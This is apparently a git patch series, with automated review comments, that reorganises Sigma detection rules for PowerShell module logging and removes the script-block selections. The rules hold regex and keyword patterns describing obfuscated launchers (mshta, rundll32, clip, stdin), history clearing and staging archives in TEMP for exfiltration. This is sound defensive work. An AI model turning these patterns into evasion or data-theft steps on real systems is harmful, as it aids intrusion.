2020/10/09 +modified: 2021/10/07 tags: - attack.execution - attack.t1059.001 @@ -16,17 +19,8 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104 , Module Logging must be enable for 4103 + definition: Module Logging must be enable detection: - selection_4104: - EventID: 4104 - ScriptBlockText|contains: - - '$DoIt' - - 'harmj0y' - - 'mattifestation' - - '_RastaMouse' - - 'tifkin_' - - '0xdeadbeef' selection_4103: EventID: 4103 Payload|contains: 
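Review bot: The rewritten `definition` line still reads `Module Logging must be enable`, which is ungrammatical and, now that the 4104 selections are being removed from these rules, no longer names the event the rule depends on; `definition: Module Logging must be enabled (Event ID 4103)` says both. The same replacement text is introduced in `powershell_bad_opsec_artifacts.yml` on this line, and in `powershell_clear_powershell_history.yml`, `powershell_decompress_commands.yml` and `powershell_get_clipboard.yml` on the following lines, so it is a single find-and-replace across the commit. `powershell_clear_powershell_history.yml` receives a new `id` and `related` block but, unlike the decompress and clipboard rules, no `modified:` bump is visible in its header hunk; if the field exists further down it should be updated to match.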
@@ -36,7 +30,7 @@ detection: - '_RastaMouse' - 'tifkin_' - '0xdeadbeef' - condition: selection_4104 or selection_4103 + condition: selection_4103 falsepositives: - 'Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.' level: critical diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml similarity index 58% rename from rules/windows/powershell/powershell_clear_powershell_history.yml rename to rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 430e9305..fb57e960 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -1,5 +1,8 @@ title: Clear PowerShell History -id: dfba4ce1-e0ea-495f-986e-97140f31af2d +id: f99276ad-d122-4989-a09a-d00904a5f9d2 +related: + - id: dfba4ce1-e0ea-495f-986e-97140f31af2d + type: derived status: experimental description: Detects keywords that could indicate clearing PowerShell history date: 2019/10/25 @@ -14,22 +17,8 @@ tags: logsource: product: windows service: powershell - definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - selection_2: - ScriptBlockText|contains: - - 'del' - - 'Remove-Item' - - 'rm' - ScriptBlockText|contains|all: - - '(Get-PSReadlineOption).HistorySavePath' - selection_3: - ScriptBlockText|contains|all: - - 'Set-PSReadlineOption' - - '–HistorySaveStyle' - - 'SaveNothing' selection_4: EventID: 4103 selection_5: 
@@ -44,8 +33,7 @@ detection: - 'Set-PSReadlineOption' - '–HistorySaveStyle' - 'SaveNothing' - condition: selection_1 and ( selection_2 or selection_3 ) or - selection_4 and ( selection_5 or selection_6 ) + condition: selection_4 and ( selection_5 or selection_6 ) falsepositives: - Legitimate PowerShell scripts level: medium diff --git a/rules/windows/powershell/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml similarity index 70% rename from rules/windows/powershell/powershell_decompress_commands.yml rename to rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index 19028f6a..e30c7fe3 100644 --- a/rules/windows/powershell/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -1,8 +1,12 @@ title: PowerShell Decompress Commands -id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 +id: 1ddc1472-8e52-4f7d-9f11-eab14fc171f5 +related: + - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 + type: derived description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. status: experimental date: 2020/05/02 +modified: 2021/10/07 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.defense_evasion @@ -13,15 +17,12 @@ references: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection1: - EventID: 4104 - ScriptBlockText|contains: 'Expand-Archive' selection2: EventID: 4103 Payload|contains: 'Expand-Archive' - condition: selection1 or selection2 + condition: selection2 falsepositives: - unknown level: informational \ No newline at end of file 
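Review bot: The surviving `selection_6` value `'–HistorySaveStyle'` in this hunk's context lines appears to start with an en dash (U+2013) rather than an ASCII hyphen, so a plain `Set-PSReadlineOption -HistorySaveStyle SaveNothing` would fail the `contains|all` and the rule would miss the common spelling. PowerShell does accept Unicode dashes as parameter prefixes, so keeping the en-dash variant is fine, but the ASCII form should be covered as well, e.g. by matching `'HistorySaveStyle'` without the dash or by adding a second `contains|all` list with `'-HistorySaveStyle'`. The `detection:` block this hunk edits starts outside the hunk.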
diff --git a/rules/windows/powershell/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml similarity index 70% rename from rules/windows/powershell/powershell_get_clipboard.yml rename to rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 542c432c..2902ece6 100644 --- a/rules/windows/powershell/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -1,8 +1,12 @@ title: PowerShell Get Clipboard -id: 5486f63a-aa4c-488d-9a61-c9192853099f +id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 +related: + - id: 5486f63a-aa4c-488d-9a61-c9192853099f + type: derived description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. status: experimental date: 2020/05/02 +modified: 2021/10/07 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.collection @@ -13,15 +17,12 @@ references: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection1: - EventID: 4104 - ScriptBlockText|contains: 'Get-Clipboard' selection2: EventID: 4103 Payload|contains: 'Get-Clipboard' - condition: selection1 or selection2 + condition: selection2 falsepositives: - unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml similarity index 62% rename from rules/windows/powershell/powershell_invoke_obfuscation_clip.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index 45c57fa3..a203d470 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_clip.yml 
+++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation CLIP+ Launcher -id: 73e67340-0d25-11eb-adc1-0242ac120002 +id: a136cde0-61ad-4a61-9b82-8dc490e60dd2 +related : + - id: 73e67340-0d25-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104 , Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml similarity index 59% rename from rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index 94164d37..2dcd9ad2 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml 
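Review bot: The added key in the first hunk is written `related :` with a space before the colon, while every sibling rule in this commit writes `related:`; most YAML loaders trim it to the same key, but it is inconsistent and likely to trip a schema or lint check that looks for the exact token. Change the line to `related:`.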
@@ -1,10 +1,13 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation -id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 +id: 2f211361-7dce-442d-b78a-c04039677378 +related: + - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 + type: derived description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 -modified: 2020/08/24 +modified: 2021/10/07 tags: - attack.defense_evasion - attack.t1027 @@ -14,18 +17,8 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - selection_2: - - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' selection_3: EventID: 4103 selection_4: @@ -36,7 +29,7 @@ detection: - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' - condition: ( selection_1 and selection_2 ) or ( selection_3 and selection_4 ) + condition: selection_3 and selection_4 falsepositives: - Unknown level: high 
diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml similarity index 63% rename from rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index a8b5d343..d531c87e 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation STDIN+ Launcher -id: 779c8c12-0eb1-11eb-adc1-0242ac120002 +id: 9ac8b09b-45de-4a07-9da1-0de8c09304a3 +related: + - id: 779c8c12-0eb1-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -14,15 +17,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml similarity index 61% rename from rules/windows/powershell/powershell_invoke_obfuscation_var.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index f8476262..6f187cfb 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_var.yml 
+++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation VAR+ Launcher -id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 +id: 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e +related: + - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of Environment Variables to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -14,15 +17,11 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104,Module Logging must be enabled for 4103 -detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' - selection_2: + definition: Module Logging must be enable + selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml similarity index 61% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index 165d13d2..e4f1400c 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml 
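Review bot: The `detection:` key is removed together with the old `selection_1` block and never re-added, so in the new file `selection_4103:` and `condition: selection_4103` end up nested under `logsource` and the rule has no `detection` section at all; sigmac will reject it. The hunk counts (15 old lines to 11 new) confirm the line is gone rather than moved. Re-insert `detection:` between the new `definition: Module Logging must be enable` line and `selection_4103:`.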
@@ -1,9 +1,13 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION -id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 +id: 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1 +related: + - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 + type: derived description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' - condition: 1 of them + condition: selection_4103 falsepositives: - unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml similarity index 64% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index e47cf4f4..82369978 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml 
@@ -1,9 +1,13 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER -id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 +id: a23791fe-8846-485a-b16b-ca691e1b03d4 +related: + - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 + type: derived description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: medium diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml similarity index 64% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index 330912c9..15c1e5cd 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation Via Stdin -id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 +id: c72aca44-8d52-45ad-8f81-f96c4d3c755e +related: + - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 + type: derived description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community 
@@ -14,15 +17,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enable for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml similarity index 64% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 30749fc4..482721a0 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation Via Use Clip -id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 +id: ebdf49d8-b89c-46c9-8fdf-2c308406f6bd +related: + - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 + type: derived description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community 
@@ -14,15 +17,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml similarity index 63% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index ceaab349..ab47039d 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation Via Use MSHTA -id: e55a5195-4724-480e-a77e-3ebe64bd3759 +id: 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb +related: + - id: e55a5195-4724-480e-a77e-3ebe64bd3759 + type: derived description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/08 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: 
@@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enabled detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml similarity index 63% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index 445355bc..deee26ed 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation Via Use Rundll32 -id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b +id: 88a22f69-62f9-4b8a-aa00-6b0212f2f05a +related: + - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b + type: derived description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2019/10/08 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 tags: 
@@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml similarity index 62% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 60a0fe2b..06d3381a 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -1,10 +1,13 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION -id: e54f5149-6ba3-49cf-b153-070d24679126 +id: f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6 +related: + - id: e54f5149-6ba3-49cf-b153-070d24679126 + type: derived description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/07/15 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: 
@@ -15,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enabled detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r - condition: selection_1 or selection_2 + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml similarity index 100% rename from rules/windows/powershell/powershell_powercat.yml rename to rules/windows/powershell/powershell_module/powershell_powercat.yml diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml similarity index 90% rename from rules/windows/powershell/powershell_remote_powershell_session.yml rename to rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index 146af6e5..c7795387 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable and fields have to be extract from event + definition: Module Logging must be enable detection: selection: EventID: 4103 
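Review bot: The new `definition:` text reads `Module Logging must be enabled` here, in the MSHTA rule and in the zip rule, but `Module Logging must be enable` in the other files touched by this commit; the string is descriptive only, so pick one spelling (the grammatical `definition: Module Logging must be enabled`) and apply it across the batch. The `# FPs with |\/r` comment kept on the regex line is useful context and should stay.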
diff --git a/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml similarity index 100% rename from rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml rename to rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml diff --git a/rules/windows/powershell/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml similarity index 63% rename from rules/windows/powershell/powershell_susp_zip_compress.yml rename to rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 98f882e4..ab97eb0d 100644 --- a/rules/windows/powershell/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -1,9 +1,12 @@ title: Zip A Folder With PowerShell For Staging In Temp -id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 +id: daf7eb81-35fd-410d-9d7a-657837e602bb +related: + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 + related: derived status: experimental author: frack113 date: 2021/07/20 -modified: 2021/09/30 +modified: 2021/10/09 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -13,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: 4103 Module Logging must be enabled , 4104 Script Block Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 
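Review bot: The new `related` entry in the zip rule's first hunk uses `related: derived` where the Sigma schema and every sibling rule in this commit use `type: derived`, so the back-reference to `b7a3c9a3-09ea-4934-8864-6a32cacd98d9` will not be recognised as a derivation relationship. Change that line to `type: derived`.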
@@ -22,14 +25,7 @@ detection: - ' -Path ' - ' -DestinationPath ' - '$env:TEMP\' - selection_4104: - EventID: 4104 - ScriptBlockText|contains|all: - - 'Compress-Archive ' - - ' -Path ' - - ' -DestinationPath ' - - '$env:TEMP\' - condition: selection_4103 or selection_4104 + condition: selection_4103 falsepositives: - Unknown level: medium From 9b0f744f75ec6c1d2c5043d527cfe7db1a40692c Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sat, 9 Oct 2021 09:57:45 +0200 Subject: [PATCH 1190/1367] order powershell_script --- ...ke_obfuscation_clip_in_scriptblocktext.yml | 26 +++++++++++++++ ...tion_obfuscated_iex_in_scriptblocktext.yml | 32 +++++++++++++++++++ ...e_obfuscation_stdin_in_scriptblocktext.yml | 26 +++++++++++++++ ...oke_obfuscation_var_in_scriptblocktext.yml | 26 +++++++++++++++ ...cation_via_compress_in_scriptblocktext.yml | 26 +++++++++++++++ ...uscation_via_rundll_in_scriptblocktext.yml | 26 +++++++++++++++ ...fuscation_via_stdin_in_scriptblocktext.yml | 26 +++++++++++++++ ...cation_via_use_clip_in_scriptblocktext.yml | 26 +++++++++++++++ ...ation_via_use_mhsta_in_scriptblocktext.yml | 26 +++++++++++++++ ...on_via_use_rundll32_in_scriptblocktext.yml | 26 +++++++++++++++ ...obfuscation_via_var_in_scriptblocktext.yml | 26 +++++++++++++++ ...l_susp_zip_compress_in_scriptblocktext.yml | 28 ++++++++++++++++ 12 files changed, 320 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml create mode 100644 
